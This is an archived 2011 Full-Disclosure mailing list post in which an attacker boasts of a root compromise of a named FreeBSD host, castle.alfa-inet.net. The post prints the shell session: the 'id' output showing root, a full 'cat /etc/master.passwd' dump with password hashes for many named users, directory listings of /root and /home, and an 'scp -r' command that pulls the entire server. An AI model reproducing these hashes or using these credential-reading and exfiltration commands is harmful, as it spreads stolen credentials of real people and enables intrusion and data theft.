lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-Id: <20111120085720.601E865E164@mail.vmail.me>
Date: Sun, 20 Nov 2011 09:57:20 +0100 (CET)
From: airwalker@...il.me
To: full-disclosure@...ts.grok.org.uk
Subject: COMPROMISE LULZ

"I set fire to the rain"

#uname -a;id;
FreeBSD castle.alfa-inet.net 7.2-RELEASE-p8 FreeBSD 7.2-RELEASE-p8 #6: Sat Apr 23 12:52:20 EEST 2011     root@...ecat.alter.org.ua:/usr/src/sys/i386/compile/CAT_v14c  i386
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),80(www)
#cat /etc/master.passwd

# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:*:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
ftp:*:14:14::0:0:Anonymous FTP Admin:/var/tmp/ftp:/nonexistent
mysql:*:88:88::0:0:MySQL Daemon:/nonexistent:/sbin/nologin
mrtg:*:279:279::0:0:MRTG daemon:/nonexistent:/sbin/nologin
dhcpd:*:280:280::0:0:DHCP Daemon:/nonexistent:/usr/sbin/nologin
squid:*:100:100::0:0:Squid caching-proxy pseudo user:/usr/local/squid:/usr/sbin/nologin
quagga:*:101:101::0:0:Quagga Daemon:/usr/local/etc/quagga:/sbin/nologin

admin:$1$RS.puxn4$onWnfbJffqkXw/Ea0Kzv01:1001:0::0:0:Administrator:/home/admin:/bin/tcsh
alter:$1$ZTmoV5oC$h70iKYXyOnPa/EOQ5Igzy/:1002:1002::0:0:User &:/home/alter:/bin/tcsh
maxtul:$1$PPPYilLm$JSIqTcjwSDvOn9vQodQgS1:1003:1003::0:0:Max Tulyev:/home/maxtul:/bin/tcsh
triar:$1$NzcMWgQP$YWAvbobzhcPdtOgRqRXZH1:1004:1004::0:0:Artem:/home/triar:/bin/tcsh
kesha:$1$8Adj2DZF$ZWyO6zq0Yku65d1CVwxCC/:1005:1005::0:0:Kesha:/home/kesha:/bin/tcsh
elf:$1$sKue.X7p$FRG1YTlpNVVX5GxXJjEOY.:1009:1009::0:0:Elf:/home/elf:/usr/X11R6/bin/bash
count:$1$55RTwYY6$wWvt/SfP5UBl90r6QrXmY.:1010:1010::0:0:Count:/home/count:/bin/sh
skat:*$1$sg04PvbJ$vPh0EYRNAYiCjMzOI65qf/:1011:1011::0:0:Kirill:/home/skat:/bin/tcsh
phoenix:$1$J.fSJ85F$QhhtEoDf9N4KvSH4ejI1x/:1012:1012::0:0:Vova:/home/phoenix:/bin/tcsh
k291:$1$/5BalgOa$q13rDoinUYdKPlpY84P7v.:1016:1016::0:0:Ilya:/home/k291:/bin/tcsh

gel:$1$xsitPjAq$UkynpBQgSkOu.MUyZLD1y.:1017:1017::0:0:Gel:/home/gel:/bin/tcsh
druid:$1$K5YRYVj9$dbZ39L5LHuGcq0ube1lYs/:1018:1018::0:0:Druid:/home/druid:/bin/tcsh
ezzh:$1$IePEubyf$OgK4QC8kDSJxgiZE1kzT/0:1019:1019::0:0:Ezzh:/home/ezzh:/bin/tcsh
embar:$$1$ntqcCeyE$ltJuKJfnTbPmiWqevaOe1.:1013:1013::0:0:User &:/home/embar:/bin/tcsh
fatipon:$1$uvWORcFL$686Lwh0KypHcAwrlYy3Zc1:1025:1025::0:0:Alexey:/home/fatipon:/bin/tcsh

allenport:$1$.NLILTPS$mNt/RL.R20oOeSiegHbMo/:1006:1006::0:0:AllenPort Inc.:/home/allenport:/bin/sh

info:*:2000:2000::0:0:Alfa-inet info:/home/info:/sbin/nologin

nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin

castle.alfa-inet.net [62.205.132.50]

ls -la /root/
total 7796
drwxr-xr-x   9 root  wheel     1024 Nov  7 01:55 ./
drwxr-xr-x  24 root  wheel      512 Apr 21  2011 ../
-rw-r--r--   2 root  wheel      786 Feb 24  2008 .cshrc
-rw-------   1 root  wheel       18 Nov 18 18:01 .history
-rw-------   1 root  wheel     1133 Jul 28  2009 .joe_state
-rw-r--r--   1 root  wheel      143 Feb 24  2008 .k5login
-rw-------   1 root  wheel      686 Nov  7 21:27 .lesshst
drwx------   2 root  wheel      512 Nov  7 02:45 .links/
-rw-r--r--   1 root  wheel      293 Feb 24  2008 .login
drwxr-xr-x   3 root  wheel      512 Oct 17 14:54 .mc/
-rw-------   1 root  wheel     3111 Sep 30  2009 .mysql_history
-rw-r--r--   2 root  wheel      253 Feb 24  2008 .profile
-rw-------   1 root  wheel     1024 Aug 20  2008 .rnd
drwx------   2 root  wheel      512 Jul  8 17:09 .ssh/
-rw-r--r--   1 root  wheel     3711 Jun  7  2008 .tcshrc
drwxr-xr-x   8 root  wheel      512 Jan 23  2009 dhcp_probe-1.0.7/
-rw-r--r--   1 root  wheel   176501 Jan 23  2009 dhcp_probe-1.0.7.tar.gz
drwxr-xr-x   8 root  wheel     1024 Jan 23  2009 dhcp_probe-1.2.0/
-rw-r--r--   1 root  wheel   186905 Jan 23  2009 dhcp_probe-1.2.0.tar.gz
drwxr-xr-x   8 root  wheel     1024 Jan 23  2009 dhcp_probe-1.2.1/
-rw-r--r--   1 root  wheel   190410 Jan 23  2009 dhcp_probe-1.2.1.tar.gz
drwxr-xr-x   8 root  wheel     1024 Jan 23  2009 dhcp_probe-1.2.2/
-rw-r--r--   1 root  wheel   200192 Jan 23  2009 dhcp_probe-1.2.2.tar.gz
-rw-r--r--   1 root  wheel  3144316 Jun 22  2009 triar@....214.215.216

ls -la /home
total 152
drwxr-xr-x  23 root       wheel        512 Oct 16 13:06 ./
drwxr-xr-x  24 root       wheel        512 Apr 21  2011 ../
drwxrwxr-x   2 root       operator     512 Jun  9  2010 .snap/
drwxr-xr-x   3 admin      wheel        512 Mar 11  2008 admin/
drwxr-xr-x   3 allenport  allenport    512 Jul  9  2009 allenport/
drwxr-xr-x  25 alter      alter       3584 Nov  4 23:53 alter/
drwxr-xr-x   2 root       wheel      28160 Nov 20 05:15 bkp/
drwxrwxr-x   4 root       ceo          512 Nov  4  2009 ceo/
drwxr-xr-x   2 count      count        512 Dec  1  2009 count/
drwxr-xr-x   3 druid      druid        512 Feb  6  2011 druid/
drwxr-xr-x   4 elf        elf          512 Aug 21  2010 elf/
drwxr-xr-x   4 embar      1013         512 Aug 24  2010 embar/
drwxr-xr-x   2 ezzh       ezzh         512 Mar 11  2011 ezzh/
drwxr-xr-x   2 fatipon    fatipon      512 Oct 16 17:03 fatipon/
drwxr-xr-x   2 gel        gel          512 Jan 15  2011 gel/
drwxr-xr-x   2 info       staff        512 Oct 15 14:56 info/
drwxr-xr-x   5 kesha      kesha        512 Apr 25  2011 kesha/
drwxr-xr-x   4 maxtul     maxtul       512 Oct 10 17:33 maxtul/
drwxr-xr-x   2 phoenix    phoenix      512 Jul 27  2010 phoenix/
drwxr-xr-x   5 root       wheel        512 Nov  4  2009 seo/
drwxr-xr-x   3 skat       skat         512 Oct  7  2010 skat/
drwxrwxrwx   3 root       wheel       3072 Nov  9 18:19 traf_check/
drwxr-xr-x  12 triar      triar       1024 Nov 20 09:43 triar/

scp -r root@...tle.alfa-inet.net:* .
server leeching complete...

[http://castle.alfa-inet.net/hurricane2.0.mp3]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ